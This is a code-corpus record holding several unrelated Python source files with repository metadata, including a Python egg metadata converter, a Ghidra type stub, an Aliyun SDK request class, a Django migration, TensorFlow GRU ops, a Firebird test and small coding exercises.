450e76a8bde0bd702d995fa7bb746ed920917f98
|
refs/heads/master
| 2021-01-01T19:42:03.401554
| 2014-11-10T15:01:08
| 2014-11-10T15:01:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,380
|
py
|
"""
converts the old "__egginst__.txt" files to "egginst.json"
and "_info.json" files
"""
import os
import re
import sys
import json
import time
from os.path import abspath, isdir, isfile, join
def read_old(path):
    """Parse a legacy ``__egginst__.txt`` metadata file.

    The old format is a Python snippet that assigns ``egg_name``, ``prefix``,
    ``installed_size`` and ``rel_files``; ``installed_size`` defaults to -1
    when the file omits it.  Only those four keys are returned.

    NOTE(review): this executes the file's content — acceptable because the
    file is produced by egginst itself, but never point it at untrusted input.
    """
    namespace = {'installed_size': -1}
    with open(path) as fh:
        source = fh.read()
    # exec(compile(...)) replaces the Python-2-only execfile(), so this
    # conversion helper also runs under Python 3.
    exec(compile(source, path, 'exec'), namespace)
    return {name: namespace[name]
            for name in ('egg_name', 'prefix', 'installed_size', 'rel_files')}
def write_egginst(path, d):
    """Write ``d`` to *path* as an ``egginst.json`` file.

    Converts the legacy ``rel_files`` list (plus *path* itself) into a
    ``files`` list — prefix-relative, forward-slash paths when located under
    ``sys.prefix`` — and records the current ``sys.prefix``.  Note that ``d``
    is mutated in place before being dumped.
    """
    files = []
    for rel in d['rel_files'] + [path]:
        full = abspath(join(sys.prefix, rel))
        if full.startswith(sys.prefix):
            files.append(full.replace(sys.prefix, '.').replace('\\', '/'))
        else:
            files.append(full)
    d['files'] = files
    del d['rel_files']
    d['prefix'] = sys.prefix
    with open(path, 'w') as f:
        json.dump(d, f, indent=2, sort_keys=True)
# Matches "<name>-<version>-<build>.egg", e.g. "enstaller-4.5.3-1.egg".
egg_pat = re.compile(r'([\w.]+)-([\w.]+)-(\d+)\.egg$')

def write_info(path, eggname):
    """Write an ``_info.json`` metadata file for *eggname* to *path*.

    Silently does nothing when *eggname* does not look like an egg file
    name (no match against ``egg_pat``).
    """
    match = egg_pat.match(eggname)
    if match is None:
        return
    info = {
        'key': eggname,
        'name': match.group(1).lower(),
        'version': match.group(2),
        'build': int(match.group(3)),
        'ctime': time.ctime(),
        'hook': False,
    }
    with open(path, 'w') as f:
        json.dump(info, f, indent=2, sort_keys=True)
def get_eggname():
    """Return enstaller's own egg file name, e.g. ``enstaller-4.5.0-1.egg``."""
    from enstaller import __version__ as version
    return 'enstaller-%s-1.egg' % version
def main():
    """Convert every installed package's old ``__egginst__.txt`` metadata to
    ``egginst.json`` / ``_info.json``, then ensure enstaller itself has both
    files as well."""
    egg_info_dir = join(sys.prefix, 'EGG-INFO')
    for entry in os.listdir(egg_info_dir):
        meta_dir = join(egg_info_dir, entry)
        if not isdir(meta_dir):
            continue
        old_path = join(meta_dir, '__egginst__.txt')
        if not isfile(old_path):
            continue
        egginst_path = join(meta_dir, 'egginst.json')
        info_path = join(meta_dir, '_info.json')
        if isfile(egginst_path) and isfile(info_path):
            continue  # already converted
        data = read_old(old_path)
        write_egginst(egginst_path, data)
        write_info(info_path, data['egg_name'])

    # create files for enstaller itself if necessary
    meta_dir = join(egg_info_dir, 'enstaller')
    egginst_path = join(meta_dir, 'egginst.json')
    if not isfile(egginst_path):
        write_egginst(egginst_path, dict(
            egg_name=get_eggname(), prefix=sys.prefix,
            installed_size=-1, rel_files=[]))
    info_path = join(meta_dir, '_info.json')
    if not isfile(info_path):
        write_info(info_path, get_eggname())


if __name__ == '__main__':
    main()
|
[
"shaheer.shan@gmail.com"
] |
shaheer.shan@gmail.com
|
a41def6a23f404b4cc471342fface1cd38551c6b
|
bbd65a48e9fb340b29f39082483680969d6e2571
|
/python/misc/double_letters.py
|
3c887a4d9ac46b613773398829e3c96f93bf0139
|
[
"MIT"
] |
permissive
|
christopher-burke/warmups
|
2784eef3b959bca5c270b3e642b505f3b4c0b790
|
140c96ada87ec5e9faa4622504ddee18840dce4a
|
refs/heads/master
| 2022-05-24T11:26:40.046650
| 2022-03-28T16:47:16
| 2022-03-28T16:47:16
| 152,440,792
| 0
| 0
|
MIT
| 2022-03-13T03:25:43
| 2018-10-10T14:51:43
|
Python
|
UTF-8
|
Python
| false
| false
| 712
|
py
|
#!/usr/bin/env python3
"""Double Letters.
Create a function that takes a word and returns true if the word
as two consecutive identical letters.
Source:
https://edabit.com/challenge/q3JMk2yqXfNyHWE9c
"""
import re
def double_letters(text: str) -> bool:
    """Determine if text contains two consecutive identical characters.

    Uses the `re` module with a backreference.  Note the pattern uses
    ``\\w``, so consecutive identical digits or underscores match too,
    not only letters.

    >>> double_letters("loop")
    True
    >>> double_letters("orange")
    False
    """
    # re.search returns a Match (truthy) or None; the previous
    # if/return-True/return-False pair collapses to one expression.
    return re.search(r"(\w)\1+", text) is not None
def main():
    """Run sample double_letters functions. Do not import."""
    for word in ("loop", "yummy", "orange", "munchkin"):
        print(double_letters(word))


if __name__ == "__main__":
    main()
|
[
"christopherjamesburke@gmail.com"
] |
christopherjamesburke@gmail.com
|
75ad74f6d506bc120e99ee767e0028402f3c0bfa
|
786027545626c24486753351d6e19093b261cd7d
|
/ghidra9.2.1_pyi/ghidra/app/util/bin/format/elf/ElfStringTable.pyi
|
eb2f888abcb4090c19e2aa10f46f1b875549534a
|
[
"MIT"
] |
permissive
|
kohnakagawa/ghidra_scripts
|
51cede1874ef2b1fed901b802316449b4bf25661
|
5afed1234a7266c0624ec445133280993077c376
|
refs/heads/main
| 2023-03-25T08:25:16.842142
| 2021-03-18T13:31:40
| 2021-03-18T13:31:40
| 338,577,905
| 14
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,508
|
pyi
|
import ghidra.app.util.bin
import ghidra.app.util.bin.format
import ghidra.app.util.bin.format.elf
import ghidra.program.model.data
import java.lang
# NOTE(review): auto-generated Ghidra type stub (.pyi) — signatures only, no
# runtime behaviour.  Comments were added in review; keep the signatures in
# sync with the Ghidra Java API rather than hand-editing them.
class ElfStringTable(object, ghidra.app.util.bin.format.elf.ElfFileSection):
    # Convenience DataType constants mirrored from the Ghidra API.
    ASCII: ghidra.program.model.data.DataType = char
    BYTE: ghidra.program.model.data.DataType = byte
    DWORD: ghidra.program.model.data.DataType = dword
    IBO32: ghidra.program.model.data.DataType = ImageBaseOffset32
    POINTER: ghidra.program.model.data.DataType = pointer
    QWORD: ghidra.program.model.data.DataType = qword
    STRING: ghidra.program.model.data.DataType = string
    UTF16: ghidra.program.model.data.DataType = unicode
    UTF8: ghidra.program.model.data.DataType = string-utf8
    VOID: ghidra.program.model.data.DataType = void
    WORD: ghidra.program.model.data.DataType = word

    def __init__(self):
        """
        DO NOT USE THIS CONSTRUCTOR, USE create*(GenericFactory ...) FACTORY METHODS INSTEAD.
        """
        ...

    @staticmethod
    def createElfStringTable(reader: ghidra.app.util.bin.format.FactoryBundledWithBinaryReader, header: ghidra.app.util.bin.format.elf.ElfHeader, stringTableSection: ghidra.app.util.bin.format.elf.ElfSectionHeader, fileOffset: long, addrOffset: long, length: long) -> ghidra.app.util.bin.format.elf.ElfStringTable:
        """
        Create and parse an Elf string table
        @param reader the binary reader containing the elf string table
        @param header elf header
        @param stringTableSection string table section header or null if associated with a dynamic table entry
        @param fileOffset symbol table file offset
        @param addrOffset memory address of symbol table (should already be adjusted for prelink)
        @param length length of symbol table in bytes of -1 if unknown
        @return Elf string table object
        @throws IOException
        """
        ...

    def equals(self, __a0: object) -> bool: ...

    def getAddressOffset(self) -> long: ...

    def getClass(self) -> java.lang.Class: ...

    def getEntrySize(self) -> int: ...

    def getFileOffset(self) -> long: ...

    def getLength(self) -> long: ...

    def getTableSectionHeader(self) -> ghidra.app.util.bin.format.elf.ElfSectionHeader:
        """
        Get section header which corresponds to this table, or null
        if only associated with a dynamic table entry
        @return string table section header or null
        """
        ...

    def hashCode(self) -> int: ...

    def notify(self) -> None: ...

    def notifyAll(self) -> None: ...

    def readString(self, reader: ghidra.app.util.bin.BinaryReader, stringOffset: long) -> unicode:
        """
        Read string from table at specified relative table offset
        @param reader
        @param stringOffset table relative string offset
        @return string or null on error
        """
        ...

    def toDataType(self) -> ghidra.program.model.data.DataType: ...

    def toString(self) -> unicode: ...

    @overload
    def wait(self) -> None: ...

    @overload
    def wait(self, __a0: long) -> None: ...

    @overload
    def wait(self, __a0: long, __a1: int) -> None: ...

    # Read-only property views of the getters above.
    @property
    def addressOffset(self) -> long: ...

    @property
    def entrySize(self) -> int: ...

    @property
    def fileOffset(self) -> long: ...

    @property
    def length(self) -> long: ...

    @property
    def tableSectionHeader(self) -> ghidra.app.util.bin.format.elf.ElfSectionHeader: ...
|
[
"tsunekou1019@gmail.com"
] |
tsunekou1019@gmail.com
|
b082b3c7ad5a4453378668650eaa7575368881ca
|
bbbc0e8660cf32334ff5156d974c59e9936b5fa2
|
/aliyun-python-sdk-workbench-inner/aliyunsdkworkbench_inner/request/v20210121/InnerGetSolutionRequest.py
|
d5c15d8ea09248a0672e2c3c739550bddb972c1d
|
[
"Apache-2.0"
] |
permissive
|
stevenQiang/aliyun-openapi-python-sdk
|
a201062ec1df0df44e4f540e1ae11ef35ce5eb12
|
a7e33abb4af88674be42d45db821a173c3a9dc60
|
refs/heads/master
| 2023-06-21T07:29:18.142415
| 2021-07-13T07:52:54
| 2021-07-13T07:52:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,514
|
py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
class InnerGetSolutionRequest(RpcRequest):
    # Auto-generated Alibaba Cloud request object for the Workbench-inner
    # API action "InnerGetSolution" (API version 2021-01-21).  Each query
    # parameter gets a generated get_/set_ pair; keep that convention so the
    # class stays consistent with the SDK code generator.

    def __init__(self):
        # POST is the transport method the generator configured for this action.
        RpcRequest.__init__(self, 'Workbench-inner', '2021-01-21', 'InnerGetSolution')
        self.set_method('POST')

    def get_CurrentOrgId(self):
        # Query parameter: organization id of the caller.
        return self.get_query_params().get('CurrentOrgId')

    def set_CurrentOrgId(self,CurrentOrgId):
        self.add_query_param('CurrentOrgId',CurrentOrgId)

    def get_SolutionId(self):
        # Query parameter: id of the solution to fetch.
        return self.get_query_params().get('SolutionId')

    def set_SolutionId(self,SolutionId):
        self.add_query_param('SolutionId',SolutionId)

    def get_UserId(self):
        # Query parameter: id of the requesting user.
        return self.get_query_params().get('UserId')

    def set_UserId(self,UserId):
        self.add_query_param('UserId',UserId)
|
[
"sdk-team@alibabacloud.com"
] |
sdk-team@alibabacloud.com
|
ad4b2dc8435b7049cde996a489f1a5cd634e4b65
|
61050d0d7f0c0a60474e4e85d30be4e5ea7c6b04
|
/vnf/scripting/itask.py
|
7ce7e28ed7a4fa2376510dad889f520aecf393de
|
[] |
no_license
|
danse-inelastic/vnf
|
8173f06f32b4a2fa2b71fddfe0fecf9c19e05e9a
|
be989448577f14f424aca4ce852c7198304ca57b
|
refs/heads/master
| 2021-01-22T01:06:00.294100
| 2015-05-02T23:25:45
| 2015-05-02T23:25:45
| 34,947,878
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,037
|
py
|
# -*- Python -*-
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Jiao Lin
# California Institute of Technology
# (C) 2006-2011 All Rights Reserved
#
# {LicenseText}
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
def waitForITaskToFinish(taskid, credential):
    """Poll the 'itask' actor until the task reaches a terminal state.

    Blocks the caller, sleeping 5 seconds between polls, until the task's
    state becomes 'finished', 'failed' or 'cancelled'.

    Args:
        taskid: id of the itask to watch.
        credential: credential forwarded to the `run` call.
    Raises:
        RuntimeError: if the task ends in any state other than 'finished'.
    """
    from . import run
    import time
    while 1:
        taskstatus = run(
            actor='itask',
            routine='getStatus',
            id = taskid,
            credential = credential,
            )
        # eval to a dictionary
        # SECURITY NOTE(review): eval() on the service response executes
        # arbitrary code if the response is ever attacker-controlled;
        # consider ast.literal_eval instead.
        taskstatus = eval(taskstatus)
        # check status
        if taskstatus['state'] in ['finished', 'failed', 'cancelled']:
            break
        time.sleep(5)
    if taskstatus['state'] != 'finished':
        # Parenthesized raise replaces the Python-2-only
        # `raise RuntimeError, "..."` comma syntax; same message, same type.
        raise RuntimeError("itask %s %s" % (taskid, taskstatus['state']))
    return
# version
__id__ = "$Id$"
# End of file
|
[
"linjiao@caltech.edu"
] |
linjiao@caltech.edu
|
6d78cb4e690e54c41470accfc57a37d54d557d9b
|
7002919119e429faac734099bb18d75047e49673
|
/data/course/migrations/0002_auto_20201012_1724.py
|
7a34d9c9167def4aad8410dc81a0960926d33509
|
[] |
no_license
|
Polydelta-ai/competency_model_prototype
|
47f86353a4157f68f8e3a6fd961223bd81fa3c23
|
8162ec6df5679143e3f3165a3779c1619f9c925f
|
refs/heads/main
| 2022-12-30T19:21:41.044344
| 2020-10-14T11:09:37
| 2020-10-14T11:09:37
| 301,813,276
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,300
|
py
|
# Generated by Django 3.0 on 2020-10-12 21:24
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated (Django 3.0) schema change for the course app: drops the
    # old free-text course fields and adds four nullable CharFields.
    # NOTE(review): if this migration has been applied to any database, make
    # further schema changes in a NEW migration instead of editing this one.

    dependencies = [
        ('course', '0001_initial'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='course',
            name='groups',
        ),
        migrations.RemoveField(
            model_name='course',
            name='objectives',
        ),
        migrations.RemoveField(
            model_name='course',
            name='overview',
        ),
        migrations.RemoveField(
            model_name='course',
            name='target_audience',
        ),
        # Replacement metadata columns; null=True keeps existing rows valid.
        migrations.AddField(
            model_name='course',
            name='bureau',
            field=models.CharField(max_length=256, null=True),
        ),
        migrations.AddField(
            model_name='course',
            name='category',
            field=models.CharField(max_length=256, null=True),
        ),
        migrations.AddField(
            model_name='course',
            name='duration',
            field=models.CharField(max_length=256, null=True),
        ),
        migrations.AddField(
            model_name='course',
            name='type',
            field=models.CharField(max_length=256, null=True),
        ),
    ]
|
[
"adrian@webb.sh"
] |
adrian@webb.sh
|
b7044d0662504d59b77b29979428fa9a0beec204
|
fbbe424559f64e9a94116a07eaaa555a01b0a7bb
|
/Tensorflow_Pandas_Numpy/source3.6/tensorflow/contrib/rnn/python/ops/gru_ops.py
|
75536e3f5f8cbe44231f19d4d455537e654f7a08
|
[
"MIT"
] |
permissive
|
ryfeus/lambda-packs
|
6544adb4dec19b8e71d75c24d8ed789b785b0369
|
cabf6e4f1970dc14302f87414f170de19944bac2
|
refs/heads/master
| 2022-12-07T16:18:52.475504
| 2022-11-29T13:35:35
| 2022-11-29T13:35:35
| 71,386,735
| 1,283
| 263
|
MIT
| 2022-11-26T05:02:14
| 2016-10-19T18:22:39
|
Python
|
UTF-8
|
Python
| false
| false
| 7,762
|
py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Python wrapper for the Block GRU Op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.rnn.ops import gen_gru_ops
from tensorflow.contrib.util import loader
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import rnn_cell_impl
from tensorflow.python.ops import variable_scope as vs
from tensorflow.python.platform import resource_loader
from tensorflow.python.util.deprecation import deprecated_args
_gru_ops_so = loader.load_op_library(
resource_loader.get_path_to_datafile("_gru_ops.so"))
@ops.RegisterGradient("GRUBlockCell")
def _GRUBlockCellGrad(op, *grad):
  r"""Gradient for GRUBlockCell.

  Args:
    op: Op for which the gradient is defined.
    *grad: Gradients of the optimization function wrt output
      for the Op.

  Returns:
    d_x: Gradients wrt to x
    d_h: Gradients wrt to h
    d_w_ru: Gradients wrt to w_ru
    d_w_c: Gradients wrt to w_c
    d_b_ru: Gradients wrt to b_ru
    d_b_c: Gradients wrt to b_c

  Mathematics behind the Gradients below:
  ```
  d_c_bar = d_h \circ (1-u) \circ (1-c \circ c)
  d_u_bar = d_h \circ (h-c) \circ u \circ (1-u)

  d_r_bar_u_bar = [d_r_bar d_u_bar]

  [d_x_component_1 d_h_prev_component_1] = d_r_bar_u_bar * w_ru^T

  [d_x_component_2 d_h_prevr] = d_c_bar * w_c^T

  d_x = d_x_component_1 + d_x_component_2

  d_h_prev = d_h_prev_component_1 + d_h_prevr \circ r + u
  ```
  Below calculation is performed in the python wrapper for the Gradients
  (not in the gradient kernel.)
  ```
  d_w_ru = x_h_prevr^T * d_c_bar

  d_w_c = x_h_prev^T * d_r_bar_u_bar

  d_b_ru = sum of d_r_bar_u_bar along axis = 0

  d_b_c = sum of d_c_bar along axis = 0
  ```
  """
  # Forward-pass tensors captured by the op; only d_h (gradient wrt the new
  # hidden state) is needed from the incoming gradients tuple.
  x, h_prev, w_ru, w_c, b_ru, b_c = op.inputs
  r, u, c, _ = op.outputs
  _, _, _, d_h = grad

  # The C++ kernel computes the gradients wrt the inputs and the two
  # pre-activation ("bar") terms ...
  d_x, d_h_prev, d_c_bar, d_r_bar_u_bar = gen_gru_ops.gru_block_cell_grad(
      x, h_prev, w_ru, w_c, b_ru, b_c, r, u, c, d_h)

  # ... while the weight and bias gradients are assembled here in Python,
  # following the formulas in the docstring above.
  x_h_prev = array_ops.concat([x, h_prev], 1)
  d_w_ru = math_ops.matmul(x_h_prev, d_r_bar_u_bar, transpose_a=True)
  d_b_ru = nn_ops.bias_add_grad(d_r_bar_u_bar)

  x_h_prevr = array_ops.concat([x, h_prev * r], 1)
  d_w_c = math_ops.matmul(x_h_prevr, d_c_bar, transpose_a=True)
  d_b_c = nn_ops.bias_add_grad(d_c_bar)

  return d_x, d_h_prev, d_w_ru, d_w_c, d_b_ru, d_b_c
class GRUBlockCell(rnn_cell_impl.RNNCell):
  r"""Block GRU cell implementation.

  Deprecated: use GRUBlockCellV2 instead.

  The implementation is based on:  http://arxiv.org/abs/1406.1078
  Computes the GRU cell forward propagation for 1 time step.

  This kernel op implements the following mathematical equations:

  Biases are initialized with:

  * `b_ru` - constant_initializer(1.0)
  * `b_c` - constant_initializer(0.0)

  ```
  x_h_prev = [x, h_prev]

  [r_bar u_bar] = x_h_prev * w_ru + b_ru

  r = sigmoid(r_bar)
  u = sigmoid(u_bar)

  h_prevr = h_prev \circ r

  x_h_prevr = [x h_prevr]

  c_bar = x_h_prevr * w_c + b_c
  c = tanh(c_bar)

  h = (1-u) \circ c + u \circ h_prev
  ```
  """

  @deprecated_args(None, "cell_size is deprecated, use num_units instead",
                   "cell_size")
  def __init__(self, num_units=None, cell_size=None):
    """Initialize the Block GRU cell.

    Args:
      num_units: int, The number of units in the GRU cell.
      cell_size: int, The old (deprecated) name for `num_units`.

    Raises:
      ValueError: if both cell_size and num_units are not None;
        or both are None.
    """
    # Exactly one of the two spellings must be supplied; `cell_size` is the
    # deprecated alias kept for backward compatibility.
    if (cell_size is None) == (num_units is None):
      raise ValueError("Exactly one of num_units or cell_size must be provided.")
    if num_units is None:
      num_units = cell_size
    self._cell_size = num_units

  @property
  def state_size(self):
    return self._cell_size

  @property
  def output_size(self):
    return self._cell_size

  def __call__(self, x, h_prev, scope=None):
    """GRU cell."""
    with vs.variable_scope(scope or type(self).__name__):
      input_size = x.get_shape().with_rank(2)[1]

      # Check if the input size exist.
      if input_size is None:
        raise ValueError("Expecting input_size to be set.")

      # Check cell_size == state_size from h_prev.
      cell_size = h_prev.get_shape().with_rank(2)[1]
      if cell_size != self._cell_size:
        raise ValueError("Shape of h_prev[1] incorrect: cell_size %i vs %s" %
                         (self._cell_size, cell_size))

      # NOTE(review): this None check appears unreachable — a None cell_size
      # already differs from the int self._cell_size above, which raises
      # first.  Left as-is; confirm before removing.
      if cell_size is None:
        raise ValueError("cell_size from `h_prev` should not be None.")

      # Gate weights/biases; b_ru starts at 1.0 so the gates begin mostly
      # open, matching the kernel's documented initialization.
      w_ru = vs.get_variable("w_ru", [input_size + self._cell_size,
                                      self._cell_size * 2])
      b_ru = vs.get_variable(
          "b_ru", [self._cell_size * 2],
          initializer=init_ops.constant_initializer(1.0))
      w_c = vs.get_variable("w_c",
                            [input_size + self._cell_size, self._cell_size])
      b_c = vs.get_variable(
          "b_c", [self._cell_size],
          initializer=init_ops.constant_initializer(0.0))

      _gru_block_cell = gen_gru_ops.gru_block_cell  # pylint: disable=invalid-name
      _, _, _, new_h = _gru_block_cell(
          x=x, h_prev=h_prev, w_ru=w_ru, w_c=w_c, b_ru=b_ru, b_c=b_c)

      return new_h, new_h
class GRUBlockCellV2(GRUBlockCell):
  """Temporary GRUBlockCell impl with a different variable naming scheme.

  Only differs from GRUBlockCell by variable names: parameters live in
  "gates/kernel", "gates/bias", "candidate/kernel" and "candidate/bias"
  variable scopes instead of the flat "w_ru"/"b_ru"/"w_c"/"b_c" names.
  """

  def __call__(self, x, h_prev, scope=None):
    """GRU cell."""
    with vs.variable_scope(scope or type(self).__name__):
      input_size = x.get_shape().with_rank(2)[1]

      # Check if the input size exist.
      if input_size is None:
        raise ValueError("Expecting input_size to be set.")

      # Check cell_size == state_size from h_prev.
      cell_size = h_prev.get_shape().with_rank(2)[1]
      if cell_size != self._cell_size:
        raise ValueError("Shape of h_prev[1] incorrect: cell_size %i vs %s" %
                         (self._cell_size, cell_size))

      if cell_size is None:
        raise ValueError("cell_size from `h_prev` should not be None.")

      # Same parameters as the base class, under the new scope names.
      with vs.variable_scope("gates"):
        w_ru = vs.get_variable("kernel", [input_size + self._cell_size,
                                          self._cell_size * 2])
        b_ru = vs.get_variable(
            "bias", [self._cell_size * 2],
            initializer=init_ops.constant_initializer(1.0))
      with vs.variable_scope("candidate"):
        w_c = vs.get_variable("kernel",
                              [input_size + self._cell_size, self._cell_size])
        b_c = vs.get_variable(
            "bias", [self._cell_size],
            initializer=init_ops.constant_initializer(0.0))

      _gru_block_cell = gen_gru_ops.gru_block_cell  # pylint: disable=invalid-name
      _, _, _, new_h = _gru_block_cell(
          x=x, h_prev=h_prev, w_ru=w_ru, w_c=w_c, b_ru=b_ru, b_c=b_c)

      return new_h, new_h
|
[
"ryfeus@gmail.com"
] |
ryfeus@gmail.com
|
8d61d262ed2d32d78b76380c88292faa89d7ea96
|
d125c002a6447c3f14022b786b07712a7f5b4974
|
/tests/bugs/core_0859_test.py
|
e3bbec9126ee000bf0fd91d4a9fcfd15bf56912b
|
[
"MIT"
] |
permissive
|
FirebirdSQL/firebird-qa
|
89d5b0035071f9f69d1c869997afff60c005fca9
|
cae18186f8c31511a7f68248b20f03be2f0b97c6
|
refs/heads/master
| 2023-08-03T02:14:36.302876
| 2023-07-31T23:02:56
| 2023-07-31T23:02:56
| 295,681,819
| 3
| 2
|
MIT
| 2023-06-16T10:05:55
| 2020-09-15T09:41:22
|
Python
|
UTF-8
|
Python
| false
| false
| 1,291
|
py
|
#coding:utf-8
"""
ID: issue-1249
ISSUE: 1249
TITLE: Sorting is allowed for blobs and arrays
DESCRIPTION:
NOTES:
For now we test that such operations raise an exception, as we restored the legacy
behavior until we're able to implement DISTINCT for blobs properly,
JIRA: CORE-859
FBTEST: bugs.core_0859
"""
import pytest
from firebird.qa import *
from firebird.driver import DatabaseError
init_script = """create table t (i integer, b blob sub_type text, a integer [5]);
"""
db = db_factory(init=init_script)
act = python_act('db')
@pytest.mark.version('>=3')
def test_1(act: Action):
    """CORE-859: sorting/grouping on a BLOB column must prepare cleanly,
    while the same operations on an ARRAY column must raise DatabaseError."""
    with act.db.connect() as con:
        c = con.cursor()
        # Use with to free the Statement immediately
        with c.prepare('select * from t order by b'):
            pass
        with pytest.raises(DatabaseError, match='.*Datatype ARRAY is not supported for sorting operation.*'):
            c.prepare('select * from t order by a')
        # Use with to free the Statement immediately
        with c.prepare('select b, count(*) from t group by b'):
            pass
        with pytest.raises(DatabaseError, match='.*Datatype ARRAY is not supported for sorting operation.*'):
            c.prepare('select a, count(*) from t group by a')
    # Passed.
|
[
"pcisar@ibphoenix.cz"
] |
pcisar@ibphoenix.cz
|
9eab2697aa461aa64c7d4d36bb6a56ea7a48521d
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/otherforms/_brands.py
|
764cf25e586cb39ea7275ee9a182cbf0ea77c8e2
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 218
|
py
|
#calss header
class _BRANDS():
def __init__(self,):
self.name = "BRANDS"
self.definitions = brand
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['brand']
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
f953387192ad4b6709f38021023a8739e849e939
|
3ed70536d4d06b2ac43b64976ddc43a5d7025b31
|
/uri2253.py
|
06119c5d13870da281433a9120affdffd464344a
|
[] |
no_license
|
LuisHenrique01/Questoes_URI
|
7f1d397e3cd055349939184603eb86cb4bf43d65
|
35c8e77eb7cd9da96df4268b5d71f3ad87446c89
|
refs/heads/master
| 2020-07-22T08:12:12.700484
| 2020-04-12T17:39:29
| 2020-04-12T17:39:29
| 207,126,339
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 924
|
py
|
def _senha_valida(senha):
    """Return True if `senha` is a valid password (URI 2253 rules).

    Valid means: length 6..32, only ASCII letters and digits, and at least
    one digit, one uppercase letter and one lowercase letter.
    """
    if len(senha) < 6 or len(senha) > 32:
        return False
    tem_digito = tem_maiuscula = tem_minuscula = False
    for ch in senha:
        codigo = ord(ch)
        if 48 <= codigo <= 57:       # '0'..'9'
            tem_digito = True
        elif 65 <= codigo <= 90:     # 'A'..'Z'
            tem_maiuscula = True
        elif 97 <= codigo <= 122:    # 'a'..'z'
            tem_minuscula = True
        else:
            # Any other character makes the password invalid.
            return False
    return tem_digito and tem_maiuscula and tem_minuscula


def main():
    """Read one password per line until EOF and print its verdict."""
    while True:
        try:
            senha = input()
        except EOFError:
            break
        if _senha_valida(senha):
            print('Senha valida.')
        else:
            print('Senha invalida.')
if __name__ == "__main__":
main()
|
[
"luizbueno1201@gmail.com"
] |
luizbueno1201@gmail.com
|
056a5a7fd69c9b3926985847bd9c38c278137345
|
c885e1ca19bb24f167f5284c020673246a0fc260
|
/synthesis/experiments/cnf_batch.py
|
f60be95380335a8023939af372da650722d5b95b
|
[] |
no_license
|
suomela/counting
|
6c800a2c9c56c44d0b8aac8117c79c78e6b92d8b
|
5a9f96f6cabdbb54d2cd24da014aff31f4baf05d
|
refs/heads/master
| 2022-02-25T23:07:03.078165
| 2022-01-27T19:08:49
| 2022-01-27T19:08:49
| 9,413,189
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 680
|
py
|
#! /usr/bin/env python
import os.path
import sys
PATH = sys.argv[1]
SOLVER = sys.argv[5]
SEED = int(sys.argv[4])
RANDOM_SEEDS = int(sys.argv[3])
PREFIX_PATH = sys.argv[2]
from batch import *
def cmd_out(**params):
    """Build the solver command line for one synthesis job.

    `params` must contain nodes, states, faulty, time, cyclicity, id and
    seed; relies on module globals PREFIX_PATH, PATH and SOLVER (parsed
    from sys.argv at import time).
    """
    # Output directory name encodes all job parameters for traceability.
    prefix = "{path}/n{nodes}-s{states}-f{faulty}-t{time}-{cyclicity}-{id}-seed{seed}".format(path=PREFIX_PATH, **params)
    cmd = "{path} -solver={solver} -outdir={prefix} -nodes={nodes} -states={states} -time={time} -faulty={faulty} -{cyclicity} -seed={seed}".format(path=PATH, solver=SOLVER, prefix=prefix, **params)
    return cmd
import sys
params_list = read_list(sys.stdin)
output_batch(params_list, cmd_out, sys.stdout, RANDOM_SEEDS, master_seed=SEED)
|
[
"jukka.suomela@iki.fi"
] |
jukka.suomela@iki.fi
|
34d2fc4a840a02f8646dcc1a23a0e36187588c06
|
ffd5e689f88c49ab7af3554c22dc0c36301084fa
|
/longest_common_subsequence.py
|
aa5fed409ca1f399f6f93be3e79b73ae04292dfd
|
[] |
no_license
|
ellismckenzielee/codewars-python
|
1710e6f0499047139479de386927c7dbd5f1cdf6
|
af3f4b4534798a58115d0565730aae28ce87437e
|
refs/heads/master
| 2023-08-09T13:38:40.964141
| 2023-08-01T14:45:22
| 2023-08-01T14:45:22
| 168,981,376
| 45
| 18
| null | null | null | null |
UTF-8
|
Python
